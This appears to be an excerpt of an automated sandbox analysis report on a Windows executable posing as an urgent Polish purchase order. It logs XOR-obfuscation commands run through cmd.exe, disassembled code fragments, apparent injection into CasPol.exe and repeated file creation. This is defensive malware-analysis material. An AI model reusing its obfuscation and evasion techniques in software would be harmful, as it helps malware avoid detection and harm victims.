Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x39^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x26^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0E^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7F^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x71^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x71^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x39^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x26^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7F^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x3B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x05^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior

Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Code function: 1_2_10002D20 push eax; ret	1_2_10002D4E
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Code function: 1_2_05707755 push ebx; iretd	1_2_0570776D
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Code function: 1_2_057061B8 push es; retf	1_2_057061CF
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Code function: 1_2_05706EEE push ds; retf	1_2_05706F01
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Code function: 1_2_057064C9 pushfd ; iretd	1_2_057064D1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Code function: 1_2_057048AC push FFFFFF8Ah; iretd	1_2_057048AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 137_3_00BA5DE0 push 1000BA25h; ret	137_3_00BA5DE5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 137_3_00BA5DE0 push 1000BA25h; ret	137_3_00BA5DE5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 137_3_00BA5DE0 push 1000BA25h; ret	137_3_00BA5DE5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 137_3_00BA5DE0 push 1000BA25h; ret	137_3_00BA5DE5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 137_3_00BA5DE0 push 1000BA25h; ret	137_3_00BA5DE5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 137_3_00BA5DE0 push 1000BA25h; ret	137_3_00BA5DE5

Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe

Code function: 1_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

1_2_10001A5D

Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
